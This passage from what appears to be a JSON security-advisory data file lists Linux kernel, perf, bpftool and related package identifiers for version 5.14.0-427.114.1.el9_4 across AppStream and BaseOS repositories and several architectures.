"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
